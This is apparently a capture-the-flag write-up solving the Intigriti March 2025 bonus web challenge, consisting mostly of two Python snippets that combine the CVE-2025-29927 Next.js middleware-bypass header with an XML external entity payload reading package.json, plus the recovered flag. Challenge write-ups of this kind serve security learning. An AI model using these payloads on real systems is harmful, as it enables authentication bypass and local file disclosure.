Intigriti March 2025 Bonus Web Challenge

Resolution

Based on the website working with NextJS and XML edition, we suspect that related recent exploits are needed to easily solve this challenge:

# On local host
flag = __import__("json").loads(__import__("requests").post(
  "https://hackdonalds.intigriti.io/api/parse-xml",
  headers = {"X-Middleware-Subrequest":"middleware"}, # gotr00t0day/CVE-2025-29927/blob/main/CVE-2025-29927.py | eliza.how
  json    = {"xml":"<!DOCTYPE A[<!ENTITY A SYSTEM \"file:///proc/self/cwd/package.json\">]><A>&A;</A>"}  # bryanmcnulty.github.io/blob/main/_posts/2023-06-24-htb-stocker.md#local-file-disclosure
).json()["result"])["name"]
# On python3 bellard.org/jslinux/vm.html?url=alpine-x86.cfg
import json, urllib.request; flag = json.loads(json.loads(urllib.request.urlopen(urllib.request.Request(
  "https://hackdonalds.intigriti.io/api/parse-xml",
  headers = {"X-Middleware-Subrequest":"middleware", "Content-Type":"application/json"},
  data    = b'''{"xml":"<!DOCTYPE A[<!ENTITY A SYSTEM \\"file:///app/package.json\\">]><A>&A;</A>"}'''
)).read().decode())["result"])["name"]
assert flag == "INTIGRITI{XXE_1n_Ic3Cr34m_M4ch1n3s}"

Siss3l/bonus.md

Intigriti March 2025 Bonus Web Challenge

Resolution